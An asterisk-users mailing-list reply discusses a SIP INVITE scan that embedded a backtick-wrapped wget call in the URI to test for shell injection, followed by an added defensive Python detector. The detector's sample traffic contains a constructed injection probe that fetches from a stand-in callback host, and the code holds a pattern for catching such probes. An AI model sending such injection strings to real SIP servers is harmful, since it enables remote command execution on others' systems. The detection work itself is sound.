[asterisk-users] new sort of shell attack attempt via SIP?

Alex Balashov abalashov at evaristesys.com
Sun Sep 11 18:46:09 CDT 2011


On 09/11/2011 07:35 PM, Tom Browning wrote:
> I disagree with the 'review CDR' angle for a number of reasons:
>
> a) there is a backtick in the URI trying to force shell and the proper
> wget command line to send results to /dev/null
> b) the V.php (at the url) appears to do nothing at all and might just
> be empty (for log scraping), url safety checks confirm
> c) the invites were sprayed across my entire IP address range
>
> To me, this is more like a scan for any SIP host that has shell
> injection vulnerability.  The list of vulnerable hosts is just a log
> scrape away at the server 91.223.89.94

On second thought, your interpretation does make much more sense.  :-)


-- 
Alex Balashov - Principal
Evariste Systems LLC
260 Peachtree Street NW
Suite 2200
Atlanta, GA 30303
Tel: +1-678-954-0670
Fax: +1-404-961-1892
Web: http://www.evaristesys.com/
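
A defender-side check for the probe discussed in this thread (a backtick in the SIP URI, INVITEs sent across a whole address range), as an added example that is not part of the original messages. The function names, the `(src_ip, dst_ip, sip_message)` capture tuple and all sample traffic are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Backtick and $( begin shell command substitution.
# A raw backtick is not legal in a SIP URI; $( is legal but rare.
SUBSTITUTION = re.compile(r"`|\$\(")
REQUEST_LINE = re.compile(r"^([A-Z]+) (.+) SIP/2\.0$")
URI_HEADERS = ("from", "to", "contact", "f", "t", "m")  # long and compact names

def suspicious_fields(message):
    """Return [(field, raw_value)] for URI-bearing fields carrying command substitution."""
    lines = message.replace("\r\n", "\n").split("\n")
    hits = []
    m = REQUEST_LINE.match(lines[0])
    # Percent-decode first so %60 is caught as well as a literal backtick.
    if m and SUBSTITUTION.search(unquote(m.group(2))):
        hits.append(("request-uri", m.group(2)))
    for line in lines[1:]:
        if not line:  # blank line ends the headers; the body is not inspected
            break
        name, sep, value = line.partition(":")
        name = name.strip().lower()
        if sep and name in URI_HEADERS and SUBSTITUTION.search(unquote(value)):
            hits.append((name, value.strip()))
    return hits

def spraying_sources(packets, min_targets=3):
    """packets: iterable of (src_ip, dst_ip, sip_message) tuples (assumed capture format).
    Return {src: sorted dsts} for sources whose flagged requests hit >= min_targets hosts."""
    targets = defaultdict(set)
    for src, dst, message in packets:
        if suspicious_fields(message):
            targets[src].add(dst)
    return {s: sorted(d) for s, d in targets.items() if len(d) >= min_targets}

# Constructed sample traffic using documentation addresses; not taken from the thread.
PROBE = ("INVITE sip:`wget http://callback.example.invalid/probe.php`@{dst} SIP/2.0\r\n"
         "From: <sip:probe@198.51.100.7>\r\nTo: <sip:x@{dst}>\r\n\r\n")
NORMAL = ("INVITE sip:1000@{dst} SIP/2.0\r\n"
          "From: <sip:alice@203.0.113.9>\r\nTo: <sip:1000@{dst}>\r\n\r\n")
SAMPLE = [("198.51.100.7", f"192.0.2.{i}", PROBE.format(dst=f"192.0.2.{i}"))
          for i in (10, 11, 12)]
SAMPLE.append(("203.0.113.9", "192.0.2.10", NORMAL.format(dst="192.0.2.10")))

if __name__ == "__main__":
    print(spraying_sources(SAMPLE))
```

A hit on `$(` alone is a lead to review rather than proof of a probe, since both characters may appear in a legitimate SIP user part.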


